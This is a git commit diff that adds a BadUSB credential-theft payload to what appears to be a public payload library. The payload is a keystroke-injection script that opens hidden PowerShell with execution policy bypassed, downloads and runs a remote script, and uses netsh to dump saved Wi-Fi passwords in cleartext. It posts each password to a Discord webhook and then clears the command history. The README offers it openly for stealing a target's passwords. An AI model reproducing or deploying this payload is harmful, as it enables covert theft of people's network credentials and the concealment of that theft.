Merge pull request #172 from aleff-github/patch-39

WLAN-Windows-Passwords-Discord-Exfiltration
2023-06-12 14:03:59 -04:00 · 2023-06-12 14:03:59 -04:00 · dd7d3fbc11
parent 911d1e956a 2f8f774346
commit dd7d3fbc11
3 changed files with 67 additions and 0 deletions
--- a/payloads/library/credentials/WLAN-Windows-Passwords/README.md
+++ b/payloads/library/credentials/WLAN-Windows-Passwords/README.md
@ -0,0 +1,26 @@
+# WLAN Windows Password - BADUSB ✅
+
+A script used to stole target WLAN Passwords.
+
+**Category**: WLAN, Credentials
+
+## Description
+
+A script used to stole target WLAN Passwords.
+
+Opens PowerShell hidden, grabs wlan passwords, saves as a cleartext in a variable and exfiltrates info via Discord Webhook.
+
+Then it cleans up traces of what you have done after.
+
+## Getting Started
+
+### Dependencies
+
+* An internet connection
+* Windows 10,11
+
+### Executing program
+
+* Plug in your device
+* Invoke 2 netsh commands
+* Invoke-WebRequest will be entered in the Run Box to send the content
--- a/payloads/library/credentials/WLAN-Windows-Passwords/Windows-Passwords.ps1
+++ b/payloads/library/credentials/WLAN-Windows-Passwords/Windows-Passwords.ps1
@ -0,0 +1,16 @@
+
+# ENG
+netsh wlan show profile | Select-String '(?<=All User Profile\s+:\s).+' | ForEach-Object {
+    $wlan  = $_.Matches.Value
+    $passw = netsh wlan show profile $wlan key=clear | Select-String '(?<=Key Content\s+:\s).+'
+
+	$Body = @{
+		'username' = $env:username + " | " + [string]$wlan
+		'content' = [string]$passw
+	}
+	
+	Invoke-RestMethod -ContentType 'Application/Json' -Uri $discord -Method Post -Body ($Body | ConvertTo-Json)
+}
+
+# Clear the PowerShell command history
+Clear-History
--- a/payloads/library/credentials/WLAN-Windows-Passwords/payload.txt
+++ b/payloads/library/credentials/WLAN-Windows-Passwords/payload.txt
@ -0,0 +1,25 @@
+REM ###################################################################
+REM #                                                                 |
+REM # Title        : WLAN-Windows-Passwords-Discord-Exfiltration      |
+REM # Author       : Aleff                                            |
+REM # Description: A script used to stole target WLAN Passwords.      |
+REM # Category     : Credentials                                      |
+REM # Target       : Windows 10-11                                    |
+REM # Version      : 1.0                                              |
+REM #                                                                 |
+REM ###################################################################
+
+
+
+DELAY 2000
+GUI r
+DELAY 250
+STRING powershell -w h -ep bypass $discord='
+
+REM REQUIRED - Provide Discord Webhook - https://discordapp.com/api/webhooks/<webhook_id>/<token>
+DEFINE DISCORD example.com
+STRING DISCORD
+
+REM Reply example.com with YOUR LINK. The Payload should be Windows-Passwords.ps1
+DEFINE PAYLOAD example.com
+STRINGLN ';irm PAYLOAD | iex